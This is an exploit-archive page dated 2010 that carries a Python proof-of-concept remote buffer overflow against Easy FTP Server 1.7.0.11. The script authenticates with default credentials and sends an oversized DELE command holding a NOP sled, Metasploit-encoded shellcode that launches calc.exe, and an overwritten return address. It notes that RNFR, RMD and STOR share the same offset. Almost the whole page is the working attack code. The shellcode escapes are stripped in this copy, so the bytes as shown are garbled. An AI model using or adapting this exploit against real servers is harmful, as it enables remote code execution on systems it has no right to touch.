Home / os / win7

Easy FTP Server v1.7.0.11 Multiple Commands Buffer Overflow

Posted on 12 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Easy FTP Server v1.7.0.11 Multiple Commands Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================
Easy FTP Server v1.7.0.11 Multiple Commands Buffer Overflow Exploit
===================================================================

# Note: RNFR, DELE, RMD, STOR commands are have the same offset
#
# Exploit Title: Easy FTP Server v1.7.0.11 DELE Command Remote Buffer Overflow Exploit (Post Auth)
# Date: August 08, 2010
# Author: Glafkos Charalambous
# Version: 1.7.0.11
# Tested on: Windows XP SP3 En
 
import socket
import sys
 
if len(sys.argv) != 3:
    print &quot;Usage: ./easyftp_DELE.py &lt;Target IP&gt; &lt;Port&gt;&quot;
    sys.exit(1)
   
target = sys.argv[1]
port = int(sys.argv[2])
 
buffersize = 268
  
 
# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
 
shellcode = (&quot;xd9xecxbax4cx61x82xbcxd9x74x24xf4x33xc9xb1x33&quot;
&quot;x58x31x50x17x83xe8xfcx03x1cx72x60x49x60x9cxed&quot;
&quot;xb2x98x5dx8ex3bx7dx6cx9cx58xf6xddx10x2ax5axee&quot;
&quot;xdbx7ex4ex65xa9x56x61xcex04x81x4cxcfxa8x0dx02&quot;
&quot;x13xaaxf1x58x40x0cxcbx93x95x4dx0cxc9x56x1fxc5&quot;
&quot;x86xc5xb0x62xdaxd5xb1xa4x51x65xcaxc1xa5x12x60&quot;
&quot;xcbxf5x8bxffx83xedxa0x58x34x0cx64xbbx08x47x01&quot;
&quot;x08xfax56xc3x40x03x69x2bx0ex3ax46xa6x4ex7ax60&quot;
&quot;x59x25x70x93xe4x3ex43xeex32xcax56x48xb0x6cxb3&quot;
&quot;x69x15xeax30x65xd2x78x1ex69xe5xadx14x95x6ex50&quot;
&quot;xfbx1cx34x77xdfx45xeex16x46x23x41x26x98x8bx3e&quot;
&quot;x82xd2x39x2axb4xb8x57xadx34xc7x1exadx46xc8x30&quot;
&quot;xc6x77x43xdfx91x87x86xa4x6exc2x8bx8cxe6x8bx59&quot;
&quot;x8dx6ax2cxb4xd1x92xafx3dxa9x60xafx37xacx2dx77&quot;
&quot;xabxdcx3ex12xcbx73x3ex37xa8x12xacxdbx01xb1x54&quot;
&quot;x79x5e&quot;)
 
  
eip = &quot;x91xC8x41x7E&quot; # CALL EDI - user32.dll
nopsled = &quot;x90&quot; * 16
junk = &quot;x90&quot; * (buffersize-(len(nopsled)+len(shellcode)))
payload = nopsled+shellcode+junk+eip
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((target, port))
    print &quot;[+] Connected&quot;
except:
    print &quot;[!] Connection Failed&quot;
    sys.exit(0)
s.recv(1024)
     
s.send('User ftp
')
s.recv(1024)
s.send('PASS ftp
')
s.recv(1024)
print &quot;[+] Sending payload...&quot;
s.send('DELE '+payload+'
')
s.recv(1024)
s.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-12]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :